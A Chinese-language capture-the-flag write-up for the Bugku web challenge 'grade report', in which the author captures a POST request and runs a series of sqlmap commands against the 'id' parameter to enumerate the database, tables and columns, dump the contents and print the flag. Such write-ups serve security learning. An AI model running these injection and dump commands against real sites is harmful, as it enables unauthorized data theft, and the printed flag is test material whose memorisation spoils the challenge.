Bugku-WEB-成绩单(SQLMap注入)

成绩单
链接:http://120.24.86.145:8002/chengjidan/
Bugku-WEB-成绩单(SQLMap注入)_第1张图片

这个一看应该是SQL注入 先提交一个数据看看

Bugku-WEB-成绩单(SQLMap注入)_第2张图片

发现有一个post数据 那就利用这个数据注入白

先抓包

Bugku-WEB-成绩单(SQLMap注入)_第3张图片

然后点击action——>从copy to file

我保存在了 D盘Bugku.txt
Bugku-WEB-成绩单(SQLMap注入)_第4张图片
先打开sqlmap,测试目标网址使用的数据库:sqlmap -r “D:\浏览器下载\渗透测试工具\SQL注入\SQLMap命令行py2版\Bugku.txt” -p id --current-d
Bugku-WEB-成绩单(SQLMap注入)_第5张图片
得到当前使用数据库skctf_flag

之后爆数据库中的表:sqlmap -r “D:\浏览器下载\渗透测试工具\SQL注入\SQLMap命令行py2版\Bugku.txt” -p id --table -D “skctf_flag”
Bugku-WEB-成绩单(SQLMap注入)_第6张图片
获得数据库中的表fl4g和sc,看来flag像是在fl4g中:

爆f14g的列:Sqlmap sqlmap -r “D:\浏览器下载\渗透测试工具\SQL注入\SQLMap命令行py2版\Bugku.txt” -p id --column -T “fl4g” -D “skctf_flag”
Bugku-WEB-成绩单(SQLMap注入)_第7张图片
得到表fl4g中的列skctf_flag。

继续爆列skctf_flag中的字段:sqlmap -r “D:\浏览器下载\渗透测试工具\SQL注入\SQLMap命令行py2版\Bugku.txt” -p id --dump -C “skctf_flag” -T “fl4g” -D “skctf_flag”
Bugku-WEB-成绩单(SQLMap注入)_第8张图片
得到flag:BUGKU{Sql_INJECT0N_4813drd8hz4}

你可能感兴趣的:(#,Bugku-WEB类写题过程,SQLMap,WEB,sql注入)